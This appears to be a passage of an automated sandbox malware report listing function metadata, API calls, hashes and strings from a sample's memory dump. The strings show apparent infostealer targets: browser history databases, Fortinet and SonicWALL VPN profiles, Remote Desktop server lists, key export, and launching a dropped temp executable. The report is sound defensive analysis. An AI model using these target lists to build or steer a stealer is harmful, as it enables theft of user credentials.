                                                                                                                                                                • Instruction ID: 53e67d40098c5ce5e47b045f19d6fa85db67e4fd1c18d28416b7b860c5843c81
                                                                                                                                                                • Opcode Fuzzy Hash: ed9f32e50c8f5160b7ce924a75e09b74c906d36f2cf7978b60ed95eb74a4cc79
                                                                                                                                                                • Instruction Fuzzy Hash: A2D14C2AB0860249EA14FF669C610F9AB65BF457C4BE86831ED2F467C6DE2CF505C320
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$AddressCurrentLibraryLoadProcWow64
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4035193891-0
                                                                                                                                                                • Opcode ID: 365d01090172dbda6ca06dd5cbaea7123b8a2612a02b7e1af0e56df8b66fc6ac
                                                                                                                                                                • Instruction ID: bef2979e37798b7ceb4265e7ebe903f8dedc8aa955612e22f1f207ac838dccca
                                                                                                                                                                • Opcode Fuzzy Hash: 365d01090172dbda6ca06dd5cbaea7123b8a2612a02b7e1af0e56df8b66fc6ac
                                                                                                                                                                • Instruction Fuzzy Hash: 0921F9A6A187C187EF106F69AC0417AEB90FB48780FA45134DA9E06BC6DF2CE104CB20
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CryptExport$HeapProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 532797600-0
                                                                                                                                                                • Opcode ID: 7e4aefc5a259160d3bd96176410f5e013c34f79a57299891ee72d5de0e9a384b
                                                                                                                                                                • Instruction ID: 42670218d33d4b9d92caac398c9f96d71b7ff73862e62373576fc1e7765b3fbf
                                                                                                                                                                • Opcode Fuzzy Hash: 7e4aefc5a259160d3bd96176410f5e013c34f79a57299891ee72d5de0e9a384b
                                                                                                                                                                • Instruction Fuzzy Hash: C021B276A19A4292EB50EF15F851779B7A0FB84B98F908230EA5E477D4DF3CE901CB10
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$Heap$Process$CloseHandleViewlstrlen$ByteCharCreateExistsFreeMappingMultiOpenPathSizeUnmapWide__memcpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2161876737-0
                                                                                                                                                                • Opcode ID: d5ee2c10b23df17e05a64801aa7ea52e0ea5830c1dc78b399929b37101156a70
                                                                                                                                                                • Instruction ID: 5dcc0da950f1b5e1df9b7a3665b6c8ce1cac236ec40a60b2875f47005ee4bc57
                                                                                                                                                                • Opcode Fuzzy Hash: d5ee2c10b23df17e05a64801aa7ea52e0ea5830c1dc78b399929b37101156a70
                                                                                                                                                                • Instruction Fuzzy Hash: 4131C721A18A4287E720EB2AAC1C739AA90FB48BE0F944635DD5F47BD4DF3CE445C710
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$Time$CloseCreateExecuteHandlePathShellSystemTempWritewsprintf
                                                                                                                                                                • String ID: %08X.exe$open
                                                                                                                                                                • API String ID: 2307396689-1771423410
                                                                                                                                                                • Opcode ID: 5ca8c4d93bbcac26c49b5db9cd55d20708d169f99a7b767ef2df99b98dd97959
                                                                                                                                                                • Instruction ID: 5ba5d762a0cb704d9f0db5da7cf633d0d546e93ac0df2d79c77762bf11c392b4
                                                                                                                                                                • Opcode Fuzzy Hash: 5ca8c4d93bbcac26c49b5db9cd55d20708d169f99a7b767ef2df99b98dd97959
                                                                                                                                                                • Instruction Fuzzy Hash: 233197726189819BE720DF64EC887E96721FB84788FD04135DA4E46A98CF7CD60DC720
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$lstrcatlstrlen$CloseHandleHeapView__memcpy$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWide
                                                                                                                                                                • String ID: Default$LOCALAPPDATA$\History
                                                                                                                                                                • API String ID: 3980575106-3555721359
                                                                                                                                                                • Opcode ID: 3e70a395a46a2af505291de9ab1fd73a1e68383478261f10fbcbd77587007c23
                                                                                                                                                                • Instruction ID: 70951e0d433648e9dc40930cb9f716a6e92caa5e6c4c17b1f908acf7e8bd4971
                                                                                                                                                                • Opcode Fuzzy Hash: 3e70a395a46a2af505291de9ab1fd73a1e68383478261f10fbcbd77587007c23
                                                                                                                                                                • Instruction Fuzzy Hash: E4514326E18F8683E750DF28D9052A87770FB98788F95A221DB9D53756EF34E6C8C310
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateInitializeInstanceUninitialize
                                                                                                                                                                • String ID: http
                                                                                                                                                                • API String ID: 948891078-2541227442
                                                                                                                                                                • Opcode ID: 18e9702a5a47cce39de5a06ec3fe168a99fd15f0ec2ec8a116290c48367eeb9f
                                                                                                                                                                • Instruction ID: e5761aa221edabc51f4bcc549751a006e42050c7320d0cfc9a6689c4e93ca9f1
                                                                                                                                                                • Opcode Fuzzy Hash: 18e9702a5a47cce39de5a06ec3fe168a99fd15f0ec2ec8a116290c48367eeb9f
                                                                                                                                                                • Instruction Fuzzy Hash: 68415336608A429AE720AF75E8553ADABA0FB84B88F944135DA0E4ABD4DF3CF144C714
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Time$FileProcessSystem$CloseCodeExitHandleNamedObjectPeekPipeSingleTerminateWait
                                                                                                                                                                • String ID: exit
                                                                                                                                                                • API String ID: 1626563136-1626635026
                                                                                                                                                                • Opcode ID: e8db0668784a4e42b00b615d6c0ccb33bfa89d96bba3dbda8ec61e812724d3ba
                                                                                                                                                                • Instruction ID: 01ec87b187e051c685db612c1f7a06f5b83e82e774a5d57606b4bc574a1e5f5d
                                                                                                                                                                • Opcode Fuzzy Hash: e8db0668784a4e42b00b615d6c0ccb33bfa89d96bba3dbda8ec61e812724d3ba
                                                                                                                                                                • Instruction Fuzzy Hash: 93315026A0A64285EF90EF29DC50179AB65FF94B84FE41432DA1F867D9DF2CF845C320
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Create$ArrayFileSafe$DataStringTime$AccessAllocCloseExecuteFreeHandleInitInitializeInstancePathShellSystemTempUnaccessVariantVectorWritewsprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1750269033-0
                                                                                                                                                                • Opcode ID: 24e8de18f55c2aa4b7ce6dc9423715127756d38879f1172464cba5bf6f043b18
                                                                                                                                                                • Instruction ID: ebc5d8a7ac7ed36ae23b1f4869d7f4a75c108ee83af278c2946af11a4f227ab2
                                                                                                                                                                • Opcode Fuzzy Hash: 24e8de18f55c2aa4b7ce6dc9423715127756d38879f1172464cba5bf6f043b18
                                                                                                                                                                • Instruction Fuzzy Hash: 8C616636B08A069AFB04EFA9D8543AC67B0FB48B88F944531CE0E57795DF39E509C360
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00007FF780B625DC: GetProcessHeap.KERNEL32(?,?,?,00007FF780B61985,?,?,?,00007FF780B6155F), ref: 00007FF780B625E5
                                                                                                                                                                • __memcpy.DELAYIMP ref: 00007FF780B6EF5F
                                                                                                                                                                  • Part of subcall function 00007FF780B70110: __memcpy.DELAYIMP ref: 00007FF780B70141
                                                                                                                                                                  • Part of subcall function 00007FF780B70110: __memcpy.DELAYIMP ref: 00007FF780B7014F
                                                                                                                                                                  • Part of subcall function 00007FF780B6EB90: lstrlenA.KERNEL32 ref: 00007FF780B6EBAD
                                                                                                                                                                  • Part of subcall function 00007FF780B625B4: GetProcessHeap.KERNEL32 ref: 00007FF780B625C1
                                                                                                                                                                  • Part of subcall function 00007FF780B625B4: HeapFree.KERNEL32 ref: 00007FF780B625CF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap__memcpy$Process$Freelstrlen
                                                                                                                                                                • String ID: last_visit_date$moz_places$table$url
                                                                                                                                                                • API String ID: 2336645791-66087218
                                                                                                                                                                • Opcode ID: f38da07e03cbde2d6eedd0ecfeac677a508d5f57210bb8e2029f5f43fc229cd4
                                                                                                                                                                • Instruction ID: 1a993f737dc28ed1f4cb59f27eeb0ee0d83fd507c41597f39bebb32da85ee198
                                                                                                                                                                • Opcode Fuzzy Hash: f38da07e03cbde2d6eedd0ecfeac677a508d5f57210bb8e2029f5f43fc229cd4
                                                                                                                                                                • Instruction Fuzzy Hash: DC31A72660964391EA30EB26EC501AAAB50FB817C0FA04032DF6F477D6EE7DF446C720
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00007FF780B625DC: GetProcessHeap.KERNEL32(?,?,?,00007FF780B61985,?,?,?,00007FF780B6155F), ref: 00007FF780B625E5
                                                                                                                                                                • __memcpy.DELAYIMP ref: 00007FF780B6F18B
                                                                                                                                                                  • Part of subcall function 00007FF780B70110: __memcpy.DELAYIMP ref: 00007FF780B70141
                                                                                                                                                                  • Part of subcall function 00007FF780B70110: __memcpy.DELAYIMP ref: 00007FF780B7014F
                                                                                                                                                                  • Part of subcall function 00007FF780B6EB90: lstrlenA.KERNEL32 ref: 00007FF780B6EBAD
                                                                                                                                                                  • Part of subcall function 00007FF780B625B4: GetProcessHeap.KERNEL32 ref: 00007FF780B625C1
                                                                                                                                                                  • Part of subcall function 00007FF780B625B4: HeapFree.KERNEL32 ref: 00007FF780B625CF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap__memcpy$Process$Freelstrlen
                                                                                                                                                                • String ID: last_visit_time$table$url$urls
                                                                                                                                                                • API String ID: 2336645791-3896411411
                                                                                                                                                                • Opcode ID: 0c4fee5880e61eb94df5693f691bb6de24a1f0fa76f2d61ad8181ac8000b3ec7
                                                                                                                                                                • Instruction ID: cdb6942aaa9d42bd11daa5b91f07328bec973554017e62ef419b3cb6b9f0e72a
                                                                                                                                                                • Opcode Fuzzy Hash: 0c4fee5880e61eb94df5693f691bb6de24a1f0fa76f2d61ad8181ac8000b3ec7
                                                                                                                                                                • Instruction Fuzzy Hash: 3831986560864782EA30EB66EC505AAAB50FB80BC0FA04032EE6F477D5EE7CF445D720
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00007FF780B625DC: GetProcessHeap.KERNEL32(?,?,?,00007FF780B61985,?,?,?,00007FF780B6155F), ref: 00007FF780B625E5
                                                                                                                                                                • __memcpy.DELAYIMP ref: 00007FF780B6ED3F
                                                                                                                                                                  • Part of subcall function 00007FF780B70110: __memcpy.DELAYIMP ref: 00007FF780B70141
                                                                                                                                                                  • Part of subcall function 00007FF780B70110: __memcpy.DELAYIMP ref: 00007FF780B7014F
                                                                                                                                                                  • Part of subcall function 00007FF780B6EB90: lstrlenA.KERNEL32 ref: 00007FF780B6EBAD
                                                                                                                                                                  • Part of subcall function 00007FF780B625B4: GetProcessHeap.KERNEL32 ref: 00007FF780B625C1
                                                                                                                                                                  • Part of subcall function 00007FF780B625B4: HeapFree.KERNEL32 ref: 00007FF780B625CF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap__memcpy$Process$Freelstrlen
                                                                                                                                                                • String ID: last_visit_time$table$url$urls
                                                                                                                                                                • API String ID: 2336645791-3896411411
                                                                                                                                                                • Opcode ID: 1c93a10fbc3946b32b9c1c3552dd529b664ad3f7a8e60a624f2853011b0a5704
                                                                                                                                                                • Instruction ID: 5fb5faa8316bd31f70e9a0c7251b2ace73008267a2bcd8361aff4853c329cd56
                                                                                                                                                                • Opcode Fuzzy Hash: 1c93a10fbc3946b32b9c1c3552dd529b664ad3f7a8e60a624f2853011b0a5704
                                                                                                                                                                • Instruction Fuzzy Hash: 9B319A2561868382EE60EB26EC505EAAB50FB417C4FA04032DE6F477D5EE7DF455C720
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AppendPathlstrcpy
                                                                                                                                                                • String ID: ":"$"},$Software\Fortinet\FortiClient\Sslvpn\Tunnels
                                                                                                                                                                • API String ID: 3043196718-4231764533
                                                                                                                                                                • Opcode ID: fca46f4a48f03f188689557114f794a6a07c4ac55cb5b740c56f1d9bebc21b67
                                                                                                                                                                • Instruction ID: 8c185766f96dc1fb3dce3be270d4215b1611a3ca4e8c58dd5c641a525afe8b88
                                                                                                                                                                • Opcode Fuzzy Hash: fca46f4a48f03f188689557114f794a6a07c4ac55cb5b740c56f1d9bebc21b67
                                                                                                                                                                • Instruction Fuzzy Hash: B631A175614A8185DB20EF65E8141A9A761FB88BC0FA84531DE6E077C9DF3CE504CB10
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseCreateValue
                                                                                                                                                                • String ID: ?
                                                                                                                                                                • API String ID: 1818849710-1684325040
                                                                                                                                                                • Opcode ID: 3ac2c5a9dac42fe89f51ed52893421167f8e036ef2170a4c1e30b2534ed343c4
                                                                                                                                                                • Instruction ID: 1abe9c89fb4673ef7accaeffbc2865f10e9dd4575e9cc3a633034deeb3f6007b
                                                                                                                                                                • Opcode Fuzzy Hash: 3ac2c5a9dac42fe89f51ed52893421167f8e036ef2170a4c1e30b2534ed343c4
                                                                                                                                                                • Instruction Fuzzy Hash: C321A777A147808EE7209F75A8401EDBBB4FB48798B554225DE9D07B99DB3CD144CB20
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: HeapValue$AppendFreePathProcesslstrcpy
                                                                                                                                                                • String ID: "},$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles
                                                                                                                                                                • API String ID: 784796242-1893226844
                                                                                                                                                                • Opcode ID: 169641714641a2eeff94ccdc9b97ea7e64463ef1d9d5ea44a42bb8b376bf92de
                                                                                                                                                                • Instruction ID: 0462cd1d11d9b85c5db0e67679d951ff9ecb2b0cb51f7e8678427a7cba9ea491
                                                                                                                                                                • Opcode Fuzzy Hash: 169641714641a2eeff94ccdc9b97ea7e64463ef1d9d5ea44a42bb8b376bf92de
                                                                                                                                                                • Instruction Fuzzy Hash: 45115115A0868254DE20FB56EC692FAD711FF84BC0F985531EAAF4B7DADE2CE105C720
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Enum$CloseOpen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1701607978-0
                                                                                                                                                                • Opcode ID: 416c5c68e5041cda3919146f9132f3cad043645ab3bbea6a523ac74fa5a0f50e
                                                                                                                                                                • Instruction ID: 46f9932bf92f103935f35bb86d07e976a2e46a990931fb231ff6401397f9b2dc
                                                                                                                                                                • Opcode Fuzzy Hash: 416c5c68e5041cda3919146f9132f3cad043645ab3bbea6a523ac74fa5a0f50e
                                                                                                                                                                • Instruction Fuzzy Hash: 46216933618B8586D3108F15E88476AB7B4F788B84F640236EB8D43B58CF3DE559CB50
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Value$AppendPathlstrcpy
                                                                                                                                                                • String ID: Software\Microsoft\Terminal Server Client\Servers
                                                                                                                                                                • API String ID: 19203174-1233151749
                                                                                                                                                                • Opcode ID: f22770c626a287e8e80e15e2856392f6d1f6e478edd3b45d1de5ed20fdf75b49
                                                                                                                                                                • Instruction ID: 40bc7fd42f699eb5a8743c6ef91a064269b7e8f9e9edfa891d4595a5161dc69d
                                                                                                                                                                • Opcode Fuzzy Hash: f22770c626a287e8e80e15e2856392f6d1f6e478edd3b45d1de5ed20fdf75b49
                                                                                                                                                                • Instruction Fuzzy Hash: 7F21A26561898285DB20FF61DC242F9A751FB887C0FA84531EA6E4B7D9DE2CE605C710
                                                                                                                                                                APIs
                                                                                                                                                                • GetEnvironmentVariableW.KERNEL32 ref: 00007FF780B6FE0D
                                                                                                                                                                • lstrcatW.KERNEL32 ref: 00007FF780B6FE1A
                                                                                                                                                                  • Part of subcall function 00007FF780B6FF38: lstrlenW.KERNEL32 ref: 00007FF780B6FF5E
                                                                                                                                                                  • Part of subcall function 00007FF780B6FF38: lstrlenW.KERNEL32 ref: 00007FF780B6FF7A
                                                                                                                                                                  • Part of subcall function 00007FF780B6FF38: WideCharToMultiByte.KERNEL32 ref: 00007FF780B6FFA3
